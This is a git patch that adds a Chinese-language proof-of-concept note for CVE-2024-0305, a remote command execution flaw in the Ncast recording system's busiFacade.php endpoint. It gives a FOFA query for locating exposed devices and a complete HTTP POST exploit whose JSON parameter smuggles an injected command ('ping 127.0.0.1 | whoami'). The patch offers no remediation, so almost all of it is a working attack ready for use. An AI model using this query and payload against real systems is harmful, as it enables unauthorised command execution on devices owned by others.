From e92ae4e8b758f9b096dea5a2629c37ac641876f2 Mon Sep 17 00:00:00 2001 From: wy876 <139549762+wy876@users.noreply.github.com> Date: Tue, 16 Jan 2024 12:22:25 +0800 Subject: [PATCH] =?UTF-8?q?Create=20Ncast=E7=9B=88=E5=8F=AF=E8=A7=86?= =?UTF-8?q?=E9=AB=98=E6=B8=85=E6=99=BA=E8=83=BD=E5=BD=95=E6=92=AD=E7=B3=BB?= =?UTF-8?q?=E7=BB=9F=E5=AD=98=E5=9C=A8RCE=E6=BC=8F=E6=B4=9E(CVE-2024-0305)?= =?UTF-8?q?.md?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...高清智能录播系统存在RCE漏洞(CVE-2024-0305).md | 27 +++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 Ncast盈可视高清智能录播系统存在RCE漏洞(CVE-2024-0305).md diff --git a/Ncast盈可视高清智能录播系统存在RCE漏洞(CVE-2024-0305).md b/Ncast盈可视高清智能录播系统存在RCE漏洞(CVE-2024-0305).md new file mode 100644 index 0000000..894dec9 --- /dev/null +++ b/Ncast盈可视高清智能录播系统存在RCE漏洞(CVE-2024-0305).md @@ -0,0 +1,27 @@ +## Ncast盈可视高清智能录播系统存在RCE漏洞(CVE-2024-0305) + +Ncast盈可视高清智能录播系统是广州盈可视电子科技有限公司的一款产品。Ncast盈可视高清智能录播系统/classes/common/busiFacade.php接口存在RCE漏洞,攻击者可以利用此漏洞执行任意命令。 + + +## fofa +``` +app="Ncast-产品" && title=="高清智能录播系统" +``` + +## poc +``` +POST /classes/common/busiFacade.php HTTP/1.1 +Host: 127.0.0.1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 +Connection: close +Content-Length: 146 +Accept: */* +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +X-Requested-With: XMLHttpRequest + +%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20whoami%22%5D%7D +``` + +![052fb9df8c276d297193cd5a59c56fad](https://github.com/wy876/POC/assets/139549762/de0f032c-0ce2-4308-8987-ecd93142d133)